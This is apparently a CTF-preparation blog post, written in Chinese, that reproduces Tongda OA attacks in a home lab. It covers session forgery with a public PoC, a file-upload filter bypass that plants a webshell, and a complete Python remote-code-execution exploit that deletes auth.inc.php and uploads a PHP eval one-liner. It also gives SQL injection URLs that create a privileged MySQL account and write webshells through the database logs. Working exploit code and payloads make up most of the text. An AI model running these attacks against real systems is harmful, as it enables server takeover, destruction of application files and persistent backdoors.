一、實驗環境
靶機環境
- win7
- 192.168.73.129
攻擊機環境
- win10
- 192.168.73.1
二、漏洞復現
2.1任意用戶登錄、后台文件上傳getshell(V11.X<V11.5/2017)
靶機下載通達 oa 2017 版本,使用默認服務配置
poc 下載地址 https://github.com/NS-Sp4ce/TongDaOA-Fake-User
python3 POC.py -v 2017 -url http://192.168.73.129/ 獲得 PHPSESSID,前台 F12 替換為此 PHPSESSID,然后訪問 /general/index.php 成功登錄到管理員賬戶
后台點擊系統管理->附件管理->添加存儲目錄(選擇根目錄)->添加
然后再點擊組織->系統管理員->附件,如圖所示
直接上傳 shell.php 顯示文件不存在,抓包改為 shell.php. 文件,文件名不符合 windows 命名規范,系統自動去掉最后的點號,放包后返回文件保存路徑
冰蠍可以成功連接 http://192.168.73.129/im/2010/559350980.shell.php
2.2遠程命令執行(V11.6)
默認服務配置安裝環境,大佬的 exp 如下
import requests #填寫ip target="http://192.168.73.129/" #一句話木馬密碼pass payload="<?php eval($_POST['pass']);?>" print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA") input("Press enter to continue") print("[*]Deleting auth.inc.php....") #刪除網站里的auth.inc.php文件 url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" requests.get(url=url) print("[*]Checking if file deleted...") url=target+"/inc/auth.inc.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[-]Failed to deleted auth.inc.php") exit(-1) print("[+]Successfully deleted auth.inc.php!") print("[*]Uploading payload...") url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./" files = {'FILE1': ('deconf.php', payload)} requests.post(url=url,files=files) url=target+"/_deconf.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url) else: print("[-]Failed to upload file")
url 即為一句話木馬位置,蟻劍成功連接
2.3后台sql注入getshell(V11.7)
默認服務配置安裝環境,在通達應用服務控制中心開啟 mysql 服務,默認端口是3336,此漏洞利用需要有賬號密碼在后台登錄,/general/hr/manage/query/delete_cascade.php?condition_cascade 參數存在布爾盲注
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((1=1),1,power(9999,99))
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((1=2),1,power(9999,99))
添加賬戶 at666,密碼 abcABC@123
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
navicat 連接數據庫,由於添加的賬戶不能直接通過慢查詢日志寫入文件,需要給創建的賬戶添加權限
UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));
在注入點刷新權限,當前用戶沒有刷新權限的權限
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;
navicat 提示密碼過期,需要再次執行
http://192.168.73.129/general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION
寫 shell 方式一
select @@basedir; set global slow_query_log=on; set global slow_query_log_file='C:/MYOA/webroot/test.php'; select '<?php eval($_POST[x]);?>' or sleep(11);
寫 shell 方式二
select @@basedir; set global general_log = on; set global general_log_file ='C:/MYOA/webroot/test2.php'; select '<?php eval($_POST[y]);?>'; show variables like '%general%';
三、總結
為了准備程序員節的比賽,還沒有研究漏洞原理,只匆匆忙忙找了一些可以 getshell 的漏洞復現,如果有問題歡迎師傅們批評指正(李師傅、范師傅、劉師傅正在我旁邊專心致志復習考研,這里悄悄留個彩蛋,做為咕嚕靈波戰隊吃飯最積極的菜雞希望三位師傅越來越圓hhh)
參考:
https://www.cnblogs.com/lovequitepcs/p/12864203.html
https://blog.csdn.net/weixin_44288604/article/details/108144165
https://www.cnblogs.com/yuzly/p/13690737.html